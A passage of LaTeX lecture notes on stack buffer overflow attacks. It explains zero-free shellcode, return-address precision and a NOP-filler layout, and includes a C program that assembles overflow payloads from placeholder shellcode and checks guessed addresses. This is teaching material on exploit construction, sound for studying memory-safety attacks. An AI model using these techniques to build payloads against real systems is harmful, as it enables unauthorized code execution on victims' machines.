
\noindent This instruction does not contain any zero byte when
encoded, but produces a zero byte on the stack.

Having removed the zero bytes, we can craft the string that
will be sent to the target computer. It is typically of the
form

\begin{center}
\begin{tikzpicture}[scale=0.7]
\draw[line width=1mm] (-2, -1) rectangle (2,3);
\draw[line width=1mm] (-2,1.9) -- (2,1.9);
\draw (0,2.5) node {\large\tt shell code};
\draw[line width=1mm,fill=black] (0.3, -1) rectangle (2,-0.7);
\draw[->,line width=0.3mm] (1.05, -1) -- (1.05,-1.7) --
(-3,-1.7) -- (-3, 3.7) -- (-1.9, 3.7) -- (-1.9, 3.1);
\draw (-2, 3) node[anchor=north east] {\LARGE \color{codegreen}{``}};
\draw ( 2,-0.9) node[anchor=west] {\LARGE\color{codegreen}{''}};
\end{tikzpicture}
\end{center}

\noindent This of course requires that the buffer we are
trying to attack can at least hold the shellcode we want to
run. But as you can see, the shellcode is only 47 bytes, which
is a very low bar to jump over. More formidable is the problem
of finding the right address to jump to. As indicated in the
picture, we need to be very precise about the address at the
end of our string: it has to point exactly at the first byte of
the shellcode. While this is easy with the help of a debugger,
we typically cannot yet run anything on the machine we target,
and the address is very specific to the setup of the target
machine. One way of finding the right address is to try out
candidates one by one until we get lucky. With the large
memories available today, however, the odds are long. And if we
try out too many candidates too quickly, we might be detected
by the system administrator of the target system.

We can improve our odds considerably by the following clever
trick. Instead of placing the shellcode at the beginning of the
string, we place it at the end, just before the part that
overflows the buffer, like

\begin{center}
\begin{tikzpicture}[scale=0.7]
\draw[line width=1mm] (-2, -1) rectangle (2,3);
\draw[line width=1mm] (-2,0.3) -- (2,0.3);
\draw (0,-0.3) node {\large\tt shell code};
\draw[line width=1mm,fill=black] (0.3, -1) rectangle (2,-0.7);
\draw (-2, 3) node[anchor=north east] {\LARGE \color{codegreen}{``}};
\draw ( 2,-0.9) node[anchor=west] {\LARGE\color{codegreen}{''}};
\end{tikzpicture}
\end{center}
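The two string layouts above, as an added example that is not part of the original handout: a small C program that builds the payload for each layout from a placeholder shellcode, checks that the result contains no zero byte (otherwise a \texttt{strcpy}-style copy would stop early), and tests whether a guessed address reaches the shellcode. The distance from the buffer to the saved return address, the placeholder shellcode bytes and the stack addresses are assumptions made for this example. So is the choice of \texttt{0x90}, the single-byte x86 NOP, as the filler in front of the shellcode in the second layout; the text above does not spell out what that filler is.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Distance in bytes from the first byte of the vulnerable buffer to the
 * saved return address.  ASSUMED for this example; on a real target it
 * depends on the frame layout and must be measured (e.g. in a debugger). */
#define DIST_TO_RET 64

/* Length of the shellcode discussed in the text.  The bytes used below are
 * placeholders ('S'), not executable code; only the length matters here. */
#define SC_LEN 47

/* Little-endian encoding of a 32-bit address, as laid out in memory on x86. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* 1 if none of the first n bytes is zero, i.e. a strcpy/gets-style copy
 * delivers the whole payload; 0 if the copy would stop early. */
int payload_is_clean(const unsigned char *s, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (s[i] == 0)
            return 0;
    return 1;
}

/* First layout: shellcode, then filler up to the saved return address,
 * then the address itself.  Returns the payload length, or 0 if the
 * shellcode does not fit or the output buffer is too small. */
size_t build_head_payload(unsigned char *out, size_t cap,
                          const unsigned char *sc, size_t sc_len,
                          size_t dist, uint32_t ret_addr)
{
    if (sc_len > dist || dist + 4 > cap)
        return 0;
    memcpy(out, sc, sc_len);
    memset(out + sc_len, 'A', dist - sc_len);  /* filler after the code */
    put_le32(out + dist, ret_addr);
    return dist + 4;
}

/* Second layout: filler first, shellcode at the end just before the
 * address.  ASSUMPTION not spelled out on the page: the filler is 0x90,
 * the single-byte x86 NOP, so execution entering anywhere in the filler
 * slides forward into the shellcode. */
size_t build_tail_payload(unsigned char *out, size_t cap,
                          const unsigned char *sc, size_t sc_len,
                          size_t dist, uint32_t ret_addr)
{
    if (sc_len > dist || dist + 4 > cap)
        return 0;
    memset(out, 0x90, dist - sc_len);
    memcpy(out + dist - sc_len, sc, sc_len);
    put_le32(out + dist, ret_addr);
    return dist + 4;
}

/* Does a guessed address reach the shellcode?  With the first layout only
 * the exact first byte of the buffer works. */
int head_guess_hits(uint32_t buf_addr, uint32_t guess)
{
    return guess == buf_addr;
}

/* With the second layout any address from the start of the buffer up to
 * the first byte of the shellcode works, widening the target from one
 * byte to (dist - sc_len + 1) bytes. */
int tail_guess_hits(uint32_t buf_addr, size_t dist, size_t sc_len,
                    uint32_t guess)
{
    if (sc_len > dist)
        return 0;
    uint32_t sc_start = buf_addr + (uint32_t)(dist - sc_len);
    return guess >= buf_addr && guess <= sc_start;
}

int main(void)
{
    unsigned char sc[SC_LEN];
    unsigned char payload[DIST_TO_RET + 4];
    memset(sc, 'S', SC_LEN);                   /* placeholder shellcode */

    /* Assumed stack addresses; the second one has a zero low byte. */
    size_t n = build_tail_payload(payload, sizeof payload, sc, SC_LEN,
                                  DIST_TO_RET, 0xbffff514u);
    printf("tail layout: %zu bytes, clean=%d\n", n,
           payload_is_clean(payload, n));
    n = build_tail_payload(payload, sizeof payload, sc, SC_LEN,
                           DIST_TO_RET, 0xbffff500u);
    printf("tail layout with 0xbffff500: clean=%d\n",
           payload_is_clean(payload, n));
    return 0;
}
```

The zero-byte check applies to the address as much as to the shellcode: because x86 stores the address little-endian, the low byte comes first, so an address such as \texttt{0xbffff500} terminates the copied string before the rest of the address is written.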

\bigskip\bigskip
\subsubsection*{A Crash-Course for GDB}

\begin{itemize}